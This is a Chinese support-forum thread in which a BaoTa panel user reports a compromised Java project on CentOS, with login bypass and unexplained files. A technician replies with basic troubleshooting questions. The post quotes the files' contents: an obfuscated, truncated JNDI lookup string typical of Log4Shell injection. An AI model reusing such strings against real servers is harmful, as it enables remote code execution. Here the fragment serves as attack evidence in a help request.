【待反馈】系统被攻陷宝塔独立项目多出奇怪文件

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：[size=1.2][url=]8.2.0[/url]

系统版本：centos

问题描述：java独立项目系统被攻陷，能越过登录操作api

相关截图（日志、错误）：独立项目里面多出来了几个奇怪的文件
${:-y$}{${6pr:-j}nd${env:fm4:-}i:d${xyf::-n}s:
${url:UTF-8:http:
..'

宝塔用户_ixvyqq · 发表于 2024-8-27 17:54:58

宝塔用户_ixvyqq · 发表于 2024-8-27 17:55:53

https://i.afbcs.cn/Swjmt9

运维技术阿闯 · 发表于 2024-8-28 11:24:03

宝塔用户_ixvyqq 发表于 2024-8-27 17:55
https://i.afbcs.cn/Swjmt9

您好，无法查看您的图片，您说的应该是您的项目被攻击了吧

宝塔用户_ixvyqq · 发表于 2024-8-28 14:08:38

运维技术阿闯发表于 2024-8-28 11:24
您好，无法查看您的图片，您说的应该是您的项目被攻击了吧

对的，就是被攻击了，最后排查就是独立项目里面多出来了这些文件

宝塔用户_ixvyqq · 发表于 2024-8-28 14:10:06

宝塔用户_ixvyqq · 发表于 2024-8-28 14:11:28

宝塔用户_ixvyqq · 发表于 2024-8-28 14:12:12

这个图片地址，正常传递怎么显示不出来。。。
https://ibb.co/L1cHsLW

宝塔用户_ixvyqq · 发表于 2024-8-28 14:13:00

我研究了半天没什么文献资料，只有说ssl证书漏洞的

运维技术阿闯 · 发表于 2024-8-28 15:33:00

宝塔用户_ixvyqq 发表于 2024-8-28 14:13
我研究了半天没什么文献资料，只有说ssl证书漏洞的

您好，具体情况需要排查的，类似您是否有开启安全防护呢，是否有安装安全类的插件呢